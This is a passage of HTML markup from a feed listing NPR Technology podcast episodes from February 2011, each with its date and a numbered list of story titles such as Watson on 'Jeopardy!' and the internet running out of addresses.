$1,000, Alex 4) The Dark Side of Watson 5) The Revolution Will Be Tweeted 6) Mobile Payments Challenge Credit Cards</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 02-16-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">16 Feb 2011 | 8:04 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) The Business Of Color: Company Sets Fashion Trends 2) How Events In Egypt Are Playing Out Online 3) Defining A Data Deluge 4) On 'Jeopardy!' It's Man Vs. This Machine 5) The Incredible Shrinking Cubicle 6) Ken And Barbie Update Their Status</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://www.npr.org/templates/topics/topic.php?topicId=1019" rel="bookmark" target="_blank">NPR: 02-09-2011 Technology</a></h3><div class="full-post"><div class="author">NPR</div><div class="published">9 Feb 2011 | 8:09 pm</div><div class="entry-content"><div class="entry-bound">Stories: 1) iPad Storybook Apps And The Kids Who Love Them 2) Dilemma For U.S.: Does Net Freedom Trump Security? 3) Why The Internet Is Running Out Of Addresses 4) Is That An Ad Growing I..